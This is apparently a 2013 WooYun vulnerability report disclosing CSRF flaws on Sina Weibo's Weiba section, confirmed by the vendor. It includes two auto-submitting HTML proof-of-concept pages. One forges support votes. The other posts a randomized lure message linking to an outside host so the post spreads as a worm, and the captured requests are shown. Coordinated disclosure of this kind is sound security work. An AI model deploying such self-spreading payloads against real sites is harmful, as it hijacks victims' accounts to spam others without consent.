当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-017694

漏洞标题:新浪微博首页再来一波蠕虫

相关厂商:新浪微博

漏洞作者: 风萧萧

提交时间:2013-01-22 20:42

修复时间:2013-03-08 20:42

公开时间:2013-03-08 20:42

漏洞类型:CSRF

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-01-22: 细节已通知厂商并且等待厂商处理中
2013-01-22: 厂商已经确认,细节仅向厂商公开
2013-02-01: 细节向核心白帽子及相关领域专家公开
2013-02-11: 细节向普通白帽子公开
2013-02-21: 细节向实习白帽子公开
2013-03-08: 细节向公众公开

简要描述:

金龙大锅,我又来了

详细说明:

1.出问题的是这个地方撒!

http://weiba.weibo.com

1.jpg


2.这个站点几乎没有对CSRF做任何防范,不过加关注刷粉丝的地方除外啊!举两个例子如下:
3.首先是支持微博吧的地方,对于微博吧的支持没有防范CSRF,导致可以刷微博吧粉丝,不是刷个人粉丝的地方撒:

2.jpg


构造POC如下:

<html>
<body>
<form id="fxx" name="fxx" action="http://weiba.weibo.com/aj_baropen/support" method="POST">
<input type="text" name="abid" value="23093" />
<input type="submit" value="submit" />
</form>
<script>
	document.fxx.submit();
</script>
</body>
</html>

漏洞证明:

4.点击上图【支持一下】后,会有如下转发到微博的请求发出!

3.jpg


5.点击【发布】,抓包查看请求如下:

http://weiba.weibo.com/aj_baropen/share?__rnd=1358845029390
POST /aj_baropen/share?__rnd=1358845029390 HTTP/1.1
Host: weiba.weibo.com
Proxy-Connection: keep-alive
Content-Length: 555
Origin: http://weiba.weibo.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://weiba.weibo.com/bar/open/27872?from=repba
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: 略
text=#开通微吧#我刚刚投给了 “耽美吧” 1票,支持量达到3000 “耽美吧” 就能开通了,亲!给力支持一下吧~点此投票:http://weiba.weibo.com/bar/open/27872?from=repba&from=0&pid=a753ecd1jw1dzxuipd4hrj&_t=0


6.POST请求的几个参数都好理解,text参数是转发到微博的内容,from参数表示是来自哪里,但是pid参数不能确认,不知道是token还是什么一个指定的id,不过我去掉了是没有关系的。
7.构造如下POC页面:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>
<form id="fxx" name="fxx" action="http://weiba.weibo.com/aj_baropen/share" method="POST">
<input type="text" name="text" id="content" value="test" />
<input type="text" name="from" value="0" />
<input type="text" name="pid" value="a753ecd1jw1dzxuipd4hrj" />
<input type="submit" value="submit" />
</form>
<script>
	var random=new Array();
	random[0]="";
	random[1]="有帅哥哦";
	random[2]="有萝莉哦";
	random[3]="有小清新哦";
	random[4]="有女王哦";
	random[5]="有御姐哦";
	random[6]="有高帅富哦";
	random[7]="有女屌丝哦";
	random[8]="有美女哦";
	random[9]="有苍老师哦";
	var num =parseInt(Math.random()*10);
	var constr="   follow me! http://xssed.me/csrf/weibo.html";
	var sendstr=random[num]+constr;
	alert(sendstr);
	document.getElementById("content").setAttribute("value",sendstr);
	document.fxx.submit();
</script>
</body>
</html>


8.本地chrome浏览器运行,查看返回结果以及微博首页转发情况:

4.jpg


5.jpg


9.IE浏览器登录另一个微博账号,查找到刚才发表的微博,点击链接,同样也发表了一篇微博:

6.jpg

修复方案:

金龙大锅要言而有信哦!

版权声明:转载请注明来源 风萧萧@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2013-01-22 23:24

厂商回复:

感谢关注新浪安全。

最新状态:

暂无